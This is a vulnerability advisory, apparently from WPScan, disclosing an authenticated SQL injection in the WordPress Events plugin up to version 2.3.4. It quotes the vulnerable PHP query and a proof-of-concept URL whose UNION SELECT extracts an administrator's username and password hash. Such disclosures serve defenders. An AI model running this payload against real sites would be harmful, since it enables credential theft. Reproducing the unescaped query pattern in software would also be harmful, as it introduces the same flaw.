Events <= 2.3.4 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: administrator user.
$_GET[‘edit_event’] is not escaped.

File / Code:

Path Request: /wp-content/plugins/wp-events/wp-events.php

Line :  450 – 468

if ( isset( $_GET['edit_event'] ) ) {
   $event_edit_id = esc_attr( $_GET['edit_event'] );
}

...
$edit_event = $wpdb->get_row( "SELECT * FROM `{$wpdb->prefix}events` WHERE `id` = {$event_edit_id}" );
Proof of Concept
target.dev/wp-admin/admin.php?page=wp-events-edit&edit_event=2+UNION+SELECT+1,CONCAT(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14+FROM+wp_users+WHERE+ID=1

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/11/03/wp-events-2-3-4-wordpress-plugin-sql-injetcion/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 106
Verified No
WPVDB ID 8954

Timeline

Publicly Published 2017-11-03 (17 days ago)
Added 2017-11-12 (7 days ago)
Last Updated 2017-11-12 (7 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.